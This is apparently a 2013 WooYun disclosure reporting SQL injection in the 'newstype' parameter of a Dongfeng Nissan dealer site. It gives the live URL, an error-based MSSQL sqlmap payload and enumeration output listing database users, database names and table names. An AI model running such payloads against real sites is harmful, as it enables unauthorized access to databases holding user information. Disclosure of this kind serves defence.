当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-045933

漏洞标题:东风日产#官网存在SQL注入(设计大量用户信息)

相关厂商:dfyb.com

漏洞作者: he2des

提交时间:2013-12-19 17:14

修复时间:2013-12-24 17:15

公开时间:2013-12-24 17:15

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-12-19: 细节已通知厂商并且等待厂商处理中
2013-12-24: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

不知道提交到那里哦,所以交给cncert国家互联网应急中心了哦。

详细说明:

#1:注入点

QQ图片20131214151820.jpg


http://www.dongfeng-nissan.com.cn/dealer/nissan/zhejiang/wenzhou/wzjhong/news?newstype=NewsType_004

---
Place: GET
Parameter: newstype
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: newstype=NewsType_004' AND 2738=CONVERT(INT,(CHAR(58)+CHAR(119)+CHA
R(101)+CHAR(105)+CHAR(58)+(SELECT (CASE WHEN (2738=2738) THEN CHAR(49) ELSE CHAR
(48) END))+CHAR(58)+CHAR(106)+CHAR(108)+CHAR(106)+CHAR(58))) AND 'BhUX'='BhUX
---
[15:17:08] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET 4.0.30319, ASP.NET, Microsoft IIS 7.5
back-end DBMS: Microsoft SQL Server 2008
[15:17:08] [INFO] fetching database users
[15:17:08] [INFO] read from file 'D:\Python27\sqlmap\output\www.dongfeng-nissan.
com.cn\session': 4
[15:17:08] [INFO] the SQL query used returns 4 entries
[15:17:08] [INFO] read from file 'D:\Python27\sqlmap\output\www.dongfeng-nissan.
com.cn\session': ##MS_PolicyEventProcessingLogin##
[15:17:08] [INFO] read from file 'D:\Python27\sqlmap\output\www.dongfeng-nissan.
com.cn\session': ##MS_PolicyTsqlExecutionLogin##
[15:17:08] [INFO] read from file 'D:\Python27\sqlmap\output\www.dongfeng-nissan.
com.cn\session': read
[15:17:08] [INFO] read from file 'D:\Python27\sqlmap\output\www.dongfeng-nissan.
com.cn\session': sa
database management system users [4]:
[*] ##MS_PolicyEventProcessingLogin##
[*] ##MS_PolicyTsqlExecutionLogin##
[*] read
[*] sa
[15:17:08] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
tput\www.dongfeng-nissan.com.cn'

漏洞证明:

available databases [12]:
[*] DFLBackground
[*] DFLLoginLog
[*] DFLSitecore_Core
[*] DFLSitecore_Extend
[*] DFLSitecore_Web
[*] DFLWebService
[*] master
[*] model
[*] msdb
[*] Npass
[*] SMS
[*] tempdb

QQ图片20131214151924.jpg


[103 tables]
+------------------------------+
| dbo.ACTIVITY |
| dbo.ACTIVITY_SERIES |
| dbo.ACTIVITY_UPDATE_LOG |
| dbo.COMMON_PARAMETER |
| dbo.COMMON_PARAMETER_DETAIL |
| dbo.DEALER_BIND_MOBILE |
| dbo.DEALER_INFO |
| dbo.DEALER_KV |
| dbo.DEALER_MEDIA_MAPPING |
| dbo.DEALER_POINTS |
| dbo.DEALER_PRICE |
| dbo.DEALER_PRICE1212 |
| dbo.DEALER_PRICE20131202 |
| dbo.DEALER_SERIES_MAPPING |
| dbo.DEALER_VIDEO |
| dbo.FILE_UPLOAD |
| dbo.HELP_CENTER |
| dbo.MEDAL |
| dbo.MEDAL_DEALERS |
| dbo.MEDIA_DEALER_MAPPING |
| dbo.MEDIA_TAB_INFORMATION |
| dbo.MESSAGE_DEALER |
| dbo.MESSAGE_INFO |
| dbo.MESSAGE_USER |
| dbo.MODULE |
| dbo.NEWS |
| dbo.NEWS_MODEL_CONFIG |
| dbo.NEWS_SERIES |
| dbo.NEWS_UPDATE_LOG |
| dbo.OFFICAL_ISSUE_ACTIVITY |
| dbo.OFFICAL_ISSUE_ATTACH |
| dbo.OFFICAL_ISSUE_DEALER |
| dbo.OFFICAL_ISSUE_IMAGE |
| dbo.OFFICAL_ISSUE_KV |
| dbo.OFFICAL_ISSUE_NEWS |
| dbo.OFFICAL_ISSUE_PACKAGE |
| dbo.OFFICAL_ISSUE_VIDEO |
| dbo.ONLINEQA |
| dbo.ONLINEQA_TEMPLETE |
| dbo.ONLINE_ANSWER |
| dbo.OPERATER_LOG |
| dbo.REGION |
| dbo.REGION_DEALERS |
| dbo.REGION_DEALERS20131206 |
| dbo.REGION_DEALERS_TP |
| dbo.REGION_INFO |
| dbo.REGION_KV |
| dbo.REGION_PRICE |
| dbo.SECURITY_ACTION |
| dbo.SECURITY_MOUDLE |
| dbo.SECURITY_ROLE |
| dbo.SECURITY_USER |
| dbo.SECURITY_USER20131206 |
| dbo.SECURITY_USER_UPDATE_LOG |
| dbo.SITECORE_DEALER_PATH |
| dbo.USER_SHORT_CUT |
| dbo.VIDEO_DETAIL |
| dbo.WEBSITE_VISIT_ANALYSIS |
| dbo.WEB_FORM_CUS_INFO |
| dbo.WEB_FORM_INFO |
| dbo.ZAN |
| dbo.ZAN_DETAILS |
| dbo.ZAN_ITEM_MAPPING |
| dbo.dealername$ |
| dbo.newcount$ |
| dbo.newrd$ |
| dbo.newregion$ |
| dbo.news20131202 |
| dbo.news_20131203 |
| dbo.region1 |
| dbo.sysdiagrams |
| dbo.tmpNoRegion |
| dbo.tmpOneRoneD |
| dbo.tmp_region_venucia |
| dbo.view_AllDealerDflMails |
| dbo.view_AllDealerURLs |
| dbo.view_AllDealerURLsEx |
| dbo.view_AllDealers |
| dbo.view_AllModel |
| dbo.view_AllModelInfo |
| dbo.view_AllModelParameters |
| dbo.view_AllModelPrice |
| dbo.view_AllRegionNames |
| dbo.view_DealerCity |
| dbo.view_DealerCityCode |
| dbo.view_DealerCodes |
| dbo.view_DealerProvinceCode |
| dbo.view_DealerRegionName |
| dbo.view_ModelCodes |
| dbo.view_ModelConfig |
| dbo.view_NissanDealers |
| dbo.view_NotDealers |
| dbo.view_ProvinceCity |
| dbo.view_SeriesCodes |
| dbo.view_ShowAllSeries |
| dbo.view_ShowSerieCodes |
| dbo.view_VenuciaDealers |
| dbo.勋章类$ |
| dbo.启辰$ |
| dbo.城市站点$ |
| dbo.日产$ |
| dbo.通过绿色专营店认证名单$ |
| dbo.需要使用的专营店$ |
+------------------------------+


数据量相对比较大哦,但是还是希望贵站重视安全问题哦。

修复方案:

过滤~

版权声明:转载请注明来源 he2des@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-12-24 17:15

厂商回复:

最新状态:

暂无


漏洞评价:

评论